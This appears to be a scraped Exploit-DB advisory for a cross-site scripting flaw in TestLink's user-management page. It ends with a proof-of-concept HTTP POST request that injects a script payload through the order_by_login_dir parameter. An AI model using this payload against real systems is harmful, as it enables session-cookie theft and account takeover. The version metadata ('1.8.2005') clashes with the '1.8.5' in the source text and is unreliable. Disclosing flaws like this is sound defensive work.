Cross-Site Scripting Vulnerability in TestLink

vendor:

TestLink

by:

Unknown

5.5

CVSS

MEDIUM

Cross-Site Scripting (XSS)

CWE

Product Name: TestLink

Affected Version From: 1.8.2005

Affected Version To: 1.8.2005

Patch Exists: NO

Related CWE:

CPE: testlink

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

Cross-Site Scripting Vulnerability in TestLink

An attacker can execute arbitrary script code in the browser of an unsuspecting user by exploiting the lack of proper input sanitization in TestLink. This can lead to the theft of authentication credentials and other attacks.

Mitigation:

Ensure proper input validation and sanitization to prevent XSS attacks. Update TestLink to a patched version if available.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/37839/info

TestLink is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

TestLink 1.8.5 is vulnerable; other versions may also be affected. 

POST /testlink/lib/usermanagement/usersView.php HTTP/1.0

Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: x.x.x.x
Content-Length: 146
Cookie: PHPSESSID=8ea021778858f826c5aab8be8f38868c;TL_lastTestProjectForUserID_1=2381
Connection: Close
Pragma: no-cache

operation=order_by_role&order_by_role_dir=asc&order_by_login_dir=1>">alert(726367128870)%3B&user_order_by=order_by_login